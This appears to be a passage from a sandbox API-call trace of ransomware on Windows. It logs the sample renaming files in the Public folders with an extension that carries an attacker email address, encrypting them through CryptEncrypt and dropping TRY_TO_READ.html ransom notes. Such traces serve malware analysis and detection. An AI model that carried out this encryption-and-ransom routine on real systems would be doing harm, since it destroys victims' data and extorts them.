	[0100.812] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.812] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.815] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d4
	[0100.815] GetProcessHeap () returned 0x540000
	[0100.815] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x599528 | out: hHeap=0x540000) returned 1
	[0100.815] GetFileSizeEx (in: hFile=0x4d4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=174) returned 1
	[0100.815] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xae
	[0100.815] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.815] GetProcessHeap () returned 0x540000
	[0100.815] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.815] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.815] WriteFile (in: hFile=0x4d4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.816] WriteFile (in: hFile=0x4d4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.816] WriteFile (in: hFile=0x4d4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.816] ReadFile (in: hFile=0x4d4, lpBuffer=0x599528, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x599528*, lpNumberOfBytesRead=0x3a1f778*=0xae, lpOverlapped=0x0) returned 1
	[0100.816] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.816] WriteFile (in: hFile=0x4d4, lpBuffer=0x5995e0*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5995e0*, lpNumberOfBytesWritten=0x3a1f778*=0xae, lpOverlapped=0x0) returned 1
	[0100.816] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.816] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.816] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk", dwFileAttributes=0x80) returned 1
	[0100.817] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 43
	[0100.817] GetProcessHeap () returned 0x540000
	[0100.817] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xbc) returned 0x5919d0
	[0100.817] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk"
	[0100.817] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.817] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.819] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d4
	[0100.819] GetProcessHeap () returned 0x540000
	[0100.819] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.819] GetFileSizeEx (in: hFile=0x4d4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2025) returned 1
	[0100.819] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x7e9
	[0100.819] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.819] GetProcessHeap () returned 0x540000
	[0100.819] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.819] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.820] WriteFile (in: hFile=0x4d4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.820] WriteFile (in: hFile=0x4d4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.820] WriteFile (in: hFile=0x4d4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.820] ReadFile (in: hFile=0x4d4, lpBuffer=0x607bb8, nNumberOfBytesToRead=0x7e9, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607bb8*, lpNumberOfBytesRead=0x3a1f778*=0x7e9, lpOverlapped=0x0) returned 1
	[0100.821] SetFilePointer (in: hFile=0x4d4, lDistanceToMove=-2025, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.821] WriteFile (in: hFile=0x4d4, lpBuffer=0x6083b0*, nNumberOfBytesToWrite=0x7e9, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6083b0*, lpNumberOfBytesWritten=0x3a1f778*=0x7e9, lpOverlapped=0x0) returned 1
	[0100.821] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Documents\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da930
	[0100.821] FindNextFileW (in: hFindFile=0x5da930, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.821] FindNextFileW (in: hFindFile=0x5da930, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.821] FindNextFileW (in: hFindFile=0x5da930, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1
	[0100.821] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Music\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\my music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8
	[0100.822] FindNextFileW (in: hFindFile=0x5da930, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1
	[0100.822] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\my pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8
	[0100.823] FindNextFileW (in: hFindFile=0x5da930, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1
	[0100.823] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\my videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8
	[0100.824] FindNextFileW (in: hFindFile=0x5da930, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.824] FindNextFileW (in: hFindFile=0x5da930, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.824] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.824] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.824] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Documents\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.825] lstrlenW (lpString="C:\\\\Users\\Public\\Documents\\desktop.ini") returned 38
	[0100.825] GetProcessHeap () returned 0x540000
	[0100.825] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb2) returned 0x5a2048
	[0100.825] lstrcpyW (in: lpString1=0x5a2048, lpString2="C:\\\\Users\\Public\\Documents\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Documents\\desktop.ini") returned="C:\\\\Users\\Public\\Documents\\desktop.ini"
	[0100.825] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Documents\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.825] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.828] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8
	[0100.828] GetProcessHeap () returned 0x540000
	[0100.828] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a2048 | out: hHeap=0x540000) returned 1
	[0100.828] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=278) returned 1
	[0100.828] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x116
	[0100.828] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.828] GetProcessHeap () returned 0x540000
	[0100.828] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.828] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.828] WriteFile (in: hFile=0x4d8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.829] WriteFile (in: hFile=0x4d8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.829] WriteFile (in: hFile=0x4d8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.829] ReadFile (in: hFile=0x4d8, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x116, lpOverlapped=0x0) returned 1
	[0100.829] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-278, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.829] WriteFile (in: hFile=0x4d8, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x116, lpOverlapped=0x0) returned 1
	[0100.830] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Downloads\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca824fd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da970
	[0100.830] FindNextFileW (in: hFindFile=0x5da970, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca824fd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.830] FindNextFileW (in: hFindFile=0x5da970, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.830] FindNextFileW (in: hFindFile=0x5da970, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca824fd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca824fd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.830] FindNextFileW (in: hFindFile=0x5da970, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca824fd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca824fd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca824fd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.830] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.830] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.830] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.830] lstrlenW (lpString="C:\\\\Users\\Public\\Downloads\\desktop.ini") returned 38
	[0100.831] GetProcessHeap () returned 0x540000
	[0100.831] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb2) returned 0x5a2048
	[0100.831] lstrcpyW (in: lpString1=0x5a2048, lpString2="C:\\\\Users\\Public\\Downloads\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Downloads\\desktop.ini") returned="C:\\\\Users\\Public\\Downloads\\desktop.ini"
	[0100.831] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Downloads\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.831] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.833] CreateFileW (lpFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc
	[0100.833] GetProcessHeap () returned 0x540000
	[0100.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a2048 | out: hHeap=0x540000) returned 1
	[0100.833] GetFileSizeEx (in: hFile=0x4dc, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=174) returned 1
	[0100.833] SetFilePointer (in: hFile=0x4dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xae
	[0100.833] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.833] GetProcessHeap () returned 0x540000
	[0100.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.833] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.834] WriteFile (in: hFile=0x4dc, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.835] WriteFile (in: hFile=0x4dc, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.835] WriteFile (in: hFile=0x4dc, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.835] ReadFile (in: hFile=0x4dc, lpBuffer=0x5995e0, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5995e0*, lpNumberOfBytesRead=0x3a1f778*=0xae, lpOverlapped=0x0) returned 1
	[0100.835] SetFilePointer (in: hFile=0x4dc, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.835] WriteFile (in: hFile=0x4dc, lpBuffer=0x599528*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x599528*, lpNumberOfBytesWritten=0x3a1f778*=0xae, lpOverlapped=0x0) returned 1
	[0100.835] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Favorites\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da9b0
